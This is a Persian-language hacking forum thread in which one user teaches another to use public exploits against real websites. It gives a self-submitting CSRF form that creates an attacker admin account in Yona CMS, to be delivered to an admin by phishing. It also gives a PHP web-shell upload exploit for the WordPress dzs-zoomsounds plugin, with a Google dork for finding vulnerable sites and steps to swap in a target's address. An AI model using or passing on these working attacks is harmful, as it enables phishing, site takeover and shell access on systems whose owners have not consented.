در خواست آموزش کار با اکسپلویت ها

[sajad325]

سلام من نمی تونم با اکسپلویت ها کار کنم میشه کمکم کنید

 

الان این باگ جدید از csrf اومده ولی نمی تونم باهاش کار کنم

https://www.exploit-db.com/exploits/39988/

[Reza.Attacker]

درود دوست عزیز ببینید چیزی که داخل اکسپلویت توضیح داده شده این اکسپلویت  در cms یونا به این معنی هست که شما یک فرم رو باید برای ادمین از طریق فیشینگ یا هر روشی ارسال کنید 

 

همین که اون ادمین از فرم شما استفاده کنه میتونید اقدام کنید   برای اضافه کردن ادمین یا  کلا استفاده از  پنل مدیریتی .

 

 

این هم کد فرمتون باید تو هاستتون اپلود کنید و تو قسمتت لوکال هاست هم ادرس سایت جایگزین کنید .

 
<form method="post" action="http://localhost/admin/admin-user/add">   
<input type="hidden" name="login" value="attacker"/>
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="name" value="attacker"/>
<input type="hidden" name="role" value="admin"/>
<input type="hidden" name="password" value="attackerPassword"/>
<input type="hidden" name="active"/>
</form>
<script>
document.forms[0].submit();
</script>

[sajad325]

ممنونم خوب حالا اگه یک اکسپلویت دیگه باشه چیکار باید و شما چطوری تونستید بفهمید اینطوری باید از استفاده کنید

[sajad325]

حالا این اکسپلویت های php روش کار شون چطوری یعنی به شکل نرم افزار اجرا می شوند

 

الان این اکسپلویت هیچ توضیحی نداده یعنی الان چیکار کنم

 

https://www.exploit-db.com/exploits/37166/

[Reza.Attacker]

ببین عزیز اکثر اکسپلویت ها روش خاصی ندارند .. مثلا شما  یه نگاه به همین مینداختی میفهمیدی این اکسپلویت واسه اپلود و شل و .... خب شما میای اول دورکی که داخل

 

اکسپلویت هست رو سرچ میکنید

 

اکسپلویت

Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability
# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/
# Author: bl4ck-dz
# Date: 28/05/2015
# Infected File: upload.php
# Category: webapps
# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/
# Tested on : Linux | Windows
###################################################################################################
<?php 
$evil="dz.phtml"; 
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$evil")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); curl_close($ch); 
echo "$postResult"; 
?>
Shell Access :
http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil
 
# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs !

 دورک

inurl:/wp-content/plugins/dzs-zoomsounds/

 

 

دورک رو سرچ میکنید بعدش تکه کد زیر رو باید داخل هاستتون اپلود کنید و به جای 127.0.0.1 ادرس تارگت مورد نظرتون رو مینویسید

<?php 
$evil="dz.phtml"; 
$ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('file_field'=>"@$evil")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); curl_close($ch); 
echo "$postResult"; 
?>

اگه باگ پچ نشده باشه میتونید از مسیر زیر به شلتون دسترسی داشته باشید

http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil

این اکسپلویت مال یه سال پیشه و اکثرا سایتای باگ دار پچ شده .

 

 

یا علی

[sajad325]

خوب تو زودی فهمیدی که باید در هاست آپلودش بکنی و من هرچی فکر کردم نفهمیدم و الانم توی همین ماجراها موندم